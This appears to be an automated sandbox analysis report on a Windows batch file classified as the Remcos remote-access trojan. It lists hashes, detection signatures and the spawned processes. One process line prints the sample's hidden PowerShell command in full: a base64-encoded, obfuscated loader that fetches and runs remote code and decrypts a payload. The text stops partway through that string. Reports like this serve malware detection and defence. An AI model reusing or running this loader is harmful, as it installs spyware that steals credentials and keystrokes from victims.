Windows
Analysis Report
As7KZaO9Dy.bat
Overview
General Information
| Field | Value |
|---|---|
| Sample name | As7KZaO9Dy.bat (renamed because the original name is a hash value) |
| Original sample name | ef523c286eea072a9afd853f1c09629eaad923d3283865182ff0f75899fb5aa0.bat |
| Analysis ID | 1612234 |
| MD5 | c25ef8c23f1bb4dd53eb0e811456678b |
| SHA1 | b9ac6ded68cd19d069c49adeeb20d6b74bf6d29c |
| SHA256 | ef523c286eea072a9afd853f1c09629eaad923d3283865182ff0f75899fb5aa0 |
| Tags | abokirem-duckdns-org, bat, user-JAMESWT_MHT |
Detection
Remcos

| Field | Value |
|---|---|
| Score | 100 |
| Range | 0 - 100 |
| Confidence | 100% |
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 1976, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\As7KZaO9Dy.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1656, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4304, cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\As7KZaO9Dy.bat", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3204, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3664, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCdkcGpuenp1YXd0cmx3cmNpZHBqbnp6dWF3dHJsd3Jjd2Rwam56enVhd3RybHdyY3JkcGpuenp1YXd0cmx3cmMgZHBqbnp6dWF3dHJsd3JjLWRwam56enVhd3RybHdyY1VkcGpuenp1YXd0cmx3cmNzZHBqbnp6dWF3dHJsd3JjZWRwam56enVhd3RybHdyY0JkcGpuenp1YXd0cmx3cmNhZHBqbnp6dWF3dHJsd3Jjc2Rwam56enVhd3RybHdyY2lkcGpuenp1YXd0cmx3cmNjZHBqbnp6dWF3dHJsd3JjUGRwam56enVhd3RybHdyY2FkcGpuenp1YXd0cmx3cmNyZHBqbnp6dWF3dHJsd3Jjc2Rwam56enVhd3RybHdyY2lkcGpuenp1YXd0cmx3cmNuZHBqbnp6dWF3dHJsd3JjZ2Rwam56enVhd3RybHdyYyAiZHBqbnp6dWF3dHJsd3JjaGRwam56enVhd3RybHdyY3RkcGpuenp1YXd0cmx3cmN0ZHBqbnp6dWF3dHJsd3JjcGRwam56enVhd3RybHdyY3NkcGpuenp1YXd0cmx3cmM6ZHBqbnp6dWF3dHJsd3JjL2Rwam56enVhd3RybHdyYy9kcGpuenp1YXd0cmx3cmMwZHBqbnp6dWF3dHJsd3JjeGRwam56enVhd3RybHdyYzBkcGpuenp1YXd0cmx3cmMuZHBqbnp6dWF3dHJsd3Jjc2Rwam56enVhd3RybHdyY3RkcGpuenp1YXd0cmx3cmMvZHBqbnp6dWF3dHJsd3JjOGRwam56enVhd3RybHdyY0tkcGpuenp1YXd0cmx3cmN1ZHBqbnp6dWF3dHJsd3JjVmRwam56enVhd3RybHdyYy5kcGpuenp1YXd0cmx3cmNwZHBqbnp6dWF3dHJsd3Jjc2Rwam56enVhd3RybHdyYzFkcGpuenp1YXd0cmx3cmMiJykuUmVwbGFjZSgnZHBqbnp6dWF3dHJsd3JjJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIGpsanJuKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnKzZHWk90V2lZOUN0NVY4NDFML3IzUVdTcllCcTY3a0tOdEt0VDFpckQrbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1lXVmd0S09na1hDa0hKZzRielF6dnc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gYmpyeWsoJHBhcmFtX3Zhcil7CUlFWCAnJHBsYXRwPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG1iZGliPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckcnhhY2E9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkN